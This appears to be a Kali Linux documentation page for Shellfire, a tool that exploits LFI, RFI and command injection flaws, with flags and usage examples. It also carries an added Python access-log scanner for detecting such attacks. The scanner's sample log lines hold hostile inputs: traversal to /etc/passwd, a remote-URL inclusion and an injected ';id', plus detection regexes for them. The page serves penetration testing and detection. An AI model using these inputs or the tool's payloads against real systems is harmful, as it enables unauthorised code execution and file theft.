Category: Exploitation. Tags: lfi, rfi, command-injection, exploitation, shell

Shellfire

Shellfire is an exploitation shell designed for exploiting LFI, RFI, and command injection vulnerabilities. It provides a focused interface for leveraging these web vulnerabilities to gain shell access.

Description

Shellfire is a specialized tool in Kali Linux for exploiting Local File Inclusion (LFI), Remote File Inclusion (RFI), and command injection vulnerabilities. These are common web application flaws that can lead to remote code execution, which makes Shellfire useful to penetration testers and security researchers assessing applications with insecure file handling or inadequate input sanitization.

The tool offers an interactive shell environment tailored for these specific vulnerability types, streamlining the process of chaining exploits into practical access. It supports configuration loading and payload generation for different environments like PHP and ASP.NET, enhancing its utility in diverse web application scenarios.

Use cases include red team engagements where LFI/RFI paths are identified via reconnaissance, or command injection points discovered through fuzzing. Shellfire reduces the manual effort required to weaponize these findings into functional shells.

How It Works

Shellfire operates as an interactive exploitation shell that interfaces with vulnerable endpoints supporting LFI, RFI, or command injection. It sends crafted payloads to include remote files or inject commands, then interprets responses to build a command execution loop. The --generate option outputs standalone payloads for PHP or ASP.NET, which can be uploaded or triggered via the vulnerability. Debugging mode reveals the underlying queries sent to the target, while named configs allow pre-defined setups for repeated exploitation sessions.
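Because the tool works by sending crafted parameter values to the vulnerable endpoint, its traffic leaves the same marks in web server access logs as any other LFI, RFI or command injection attempt. The following added example (not part of the Kali page or of Shellfire) is a small Python scanner that parses access-log lines, decodes each query parameter value and flags the classic indicators for the three vulnerability classes. The log lines, the IP addresses and the indicator names are constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (Apache combined-style, trimmed); not real traffic.
SAMPLE_LOG = """\
192.0.2.10 - - [16/Apr/2026:10:00:01 +0000] "GET /index.php?page=about HTTP/1.1" 200 512
192.0.2.11 - - [16/Apr/2026:10:00:02 +0000] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 200 2048
192.0.2.12 - - [16/Apr/2026:10:00:03 +0000] "GET /index.php?page=http://203.0.113.5/x.txt HTTP/1.1" 200 77
192.0.2.13 - - [16/Apr/2026:10:00:04 +0000] "GET /ping.php?host=127.0.0.1;id HTTP/1.1" 200 300
192.0.2.14 - - [16/Apr/2026:10:00:05 +0000] "GET /index.php?page=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 2048
"""

# Pulls the method and request target out of the quoted request line.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Each indicator is applied to the fully decoded parameter value.
INDICATORS = [
    ("lfi_traversal", re.compile(r"\.\./|\.\.\\")),
    ("lfi_wrapper", re.compile(r"^(php|data|file|expect)://", re.I)),
    ("rfi_remote_url", re.compile(r"^(https?|ftp)://", re.I)),
    ("cmd_injection_meta", re.compile(r"[;&|`$]")),
]


def query_params(query: str):
    """Yield (name, value) pairs; split on '&' only, so ';' stays inside values."""
    for pair in query.split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        # Decode twice so single- and double-encoded values normalise the same way.
        yield unquote(name), unquote(unquote(value))


def analyse_request(target: str) -> list:
    """Return (indicator, parameter, decoded value) triples for suspicious values."""
    findings = []
    _, _, query = target.partition("?")
    for name, value in query_params(query):
        for indicator, rx in INDICATORS:
            if rx.search(value):
                findings.append((indicator, name, value))
    return findings


def scan_log(text: str) -> list:
    """Return one record per log line that carries at least one indicator."""
    results = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        findings = analyse_request(m.group("target"))
        if findings:
            results.append({
                "client": line.split()[0],
                "target": m.group("target"),
                "indicators": sorted({f[0] for f in findings}),
            })
    return results


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["client"], hit["indicators"], hit["target"])
```

Two caveats for anyone turning this into a detection rule: decoding must happen before matching (the last sample line is the same traversal as the second, only percent-encoded), and the metacharacter indicator will fire on legitimate values that contain `&` or `|`, so it is better used to raise the score of a request than as a standalone alert. POST bodies, which the tool may also use, are not in an access log at all and need request-body logging or a WAF to see.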

Installation

```bash
sudo apt install shellfire
```

Flags

-h, --help            show this help message and exit
-c [CONFIG]           load a named config on startup.
-d                    enable debugging (show queries during execution)
--generate PAYLOAD    generate a payload to stdout. PAYLOAD can be "php" or "aspnet".
--version             display version and exit.

Examples

Display the help message and usage information for the tool.

```bash
shellfire -h
```

Launch shellfire loading a named configuration file on startup for a specific target.

```bash
shellfire -c myconfig
```

Start shellfire with debugging enabled to show queries sent during execution.

```bash
shellfire -d
```

Generate a PHP payload to stdout for use in RFI or LFI exploitation.

```bash
shellfire --generate php
```

Generate an ASP.NET payload to stdout for command injection scenarios.

```bash
shellfire --generate aspnet
```

Display the version of shellfire and exit.

```bash
shellfire --version
```

Load a config and enable debugging for an interactive exploitation session.

```bash
shellfire -c config1 -d
```
Updated 2026-04-16. Source: kali.org